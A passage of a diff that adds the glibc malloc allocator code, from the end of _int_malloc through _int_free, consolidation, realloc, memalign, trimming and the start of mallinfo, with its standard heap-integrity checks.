+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
+                            malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                      if (bck->fd != fwd)
+                        malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
